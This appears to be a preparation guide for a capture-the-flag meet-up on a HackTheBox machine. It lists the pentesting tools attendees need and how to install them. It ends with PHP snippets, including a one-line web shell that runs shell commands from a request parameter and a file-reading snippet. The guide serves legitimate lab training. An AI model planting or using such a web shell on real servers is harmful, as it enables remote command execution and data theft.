On today's meet-up we'll be looking at a Capture-the-Flag machine from HackTheBox. We'll work through the same methodology that a penetration tester would use when approaching an target. Once finished, we will have root on the target machine as well as well-organized notes detailing our process that would form the basis of a report for the client.
Those participating are expected to have Kali Linux or Parrot Linux installed as they have the tools we will be using today. On this particular machine there is actually a path for Windows users to follow and the required tools are linked below. However, due to time constraints we won't be able to provide much support if issues arise for those on Windows.
A word of caution: although you can connect to HackTheBox from Windows directly it is strongly recommended to connect via a VM. The target environment is shared between many users so there is the potential for other users to be able to connect back to your computer.
A HackTheBox account is also required and should be set up before we begin. It is not a simple sign-up as you actually have to "hack" the website invitation system before you get a link, so give yourself a little time. You do not need a paid account for this livestream.
It is also expected to have some familiarity with the command line as the tools we are using do not have GUIs.
Linux
- Firefox or Chrome - preinstalled on Kali/Parrot
- Gobuster - preinstalled or available on Kali/Parrot
- Weevely (optional, but highly recommended) - preinstalled on Kali
- SSH - preinstalled in most Linux distros
- Ghidra (optional, but highly recommended) - download 300MB - will require Java
If Gobuster is not installed, install it through apt
sudo apt update
sudo apt install gobuster
If you do not have the JDK installed and will be using Ghidra, install the JDK as well (just over 200MB)
sudo apt update
sudo apt install default-jdk
Windows
- Firefox or Chrome
- 7-zip for .tar and .gz - 64-bit download
- PuTTY and PuTTYgen - 64-bit PuTTY - 64-bit PuTTYgen
- Gobuster - 64-bit download
- Ghidra (optional, but highly recommended) - download 300MB - will require Java
You should also have an SSH key generated for PuTTY and the RSA public key ready to use. Instructions here. Do not use a passphrase for meet-up.
If you do not have the JDK installed, you can follow these instructions. However, I believe you'll most likely be using the 64-bit OpenJDK 11/Hotspot. note, I did not test this personally
If you're not able to or prefer not to use weevely then you will need some or all of the following code snippets.
Display "Hello"
<?php echo 'Hello'; ?>Run a shell command and display the results
<?php system($_REQUEST['c']); ?>Access via http://target/script.php?c=command
Display PHP info
<?php phpinfo(); ?>Display file contents
<?php readfile('/path/to/file.txt'); ?>Run a MySQL database query
<?php
$conn = new mysqli('hostname', 'username', 'password', 'database');
$result = $conn->query('SELECT 1234');
while ($row = $result->fetch_assoc())
print_r($row);
$conn->close();
?>